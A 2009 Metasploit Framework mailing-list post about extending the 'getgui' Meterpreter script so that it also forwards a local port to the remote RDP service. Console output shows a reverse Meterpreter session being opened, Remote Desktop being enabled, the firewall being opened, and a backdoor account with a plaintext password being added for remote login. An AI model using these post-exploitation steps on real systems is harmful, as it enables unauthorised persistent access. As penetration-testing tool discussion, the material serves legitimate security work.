Meterpreter script for enabled Remote Desktop

[natron at invisibledenizen.org (natron)]

I extended this a tad to automatically forward a local port to the
remote 3389 service.  I copied in the relevant code from
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
and it seems to work just fine.

FYI, any accounts created through use of the getgui script only have
user access on the machine; you'll still want to manually drop it into
any groups you like.

-n

[*] Handler binding to LHOST 192.168.206.128
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.206.128:4444 -> 192.168.206.1:2014)

meterpreter > run getgui -h
Windows Get GUI Meterpreter Script by Darkoperator
Carlos Perez carlos_perez at darkoperator.com

Usage: getgui -u <username> -p <password> -n <lport>

OPTIONS:

    -h <opt>  Help menu.
    -n <opt>  The local port used to forward traffic to the enabled
remote desktop port.
    -p <opt>  The Password of the user to add.
    -u <opt>  The Username of the user to add.

Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
Carlos Perez carlos_perez at darkoperator.com

Usage: getgui -u <username> -p <password> -n <lport>

OPTIONS:

    -h <opt>  Help menu.
    -n <opt>  The local port used to forward traffic to the enabled
remote desktop port.
    -p <opt>  The Password of the user to add.
    -u <opt>  The Username of the user to add.

meterpreter > run getgui -n 53389 -u rdpuser -p rdppassword
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez at darkoperator.com
[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*] Setting user account for logon
[*]     Adding User: rdpuser with Password: rdppassword
[*]     Adding User: rdpuser to local group Remote Desktop Users
[*] You can now login with the created user
[*] Local TCP relay created: 0.0.0.0:53389 <-> 127.0.0.1:3389
meterpreter >



2009/1/2 Carlos Perez <carlos_perez at darkoperator.com>:
> Glad you guys liked my scripts.
> for updates on the scripts I tend to post them in my blog, in the forum for
> Remote-exploit and the forums at pauldotcom.com
>
> 2009/1/2 Rob Fuller <mubix at room362.com>
> > Darkoperator also made a windows enumeration script.
> >  http://forum.pauldotcom.com/viewtopic.php?id=151
> >
> > 2009/1/2 H D Moore <hdm at metasploit.com>
> > > Nice implementation by Carlos Perez:
> > > http://forums.remote-exploit.org/showthread.php?t=19205
> > > _______________________________________________
> > > http://spool.metasploit.com/mailman/listinfo/framework
> >
> >
> > _______________________________________________
> > http://spool.metasploit.com/mailman/listinfo/framework
>
>
> _______________________________________________
> http://spool.metasploit.com/mailman/listinfo/framework
-------------- next part --------------
A non-text attachment was scrubbed...
Name: getgui.rb
Type: application/octet-stream
Size: 5988 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090103/2a405d6a/attachment.obj>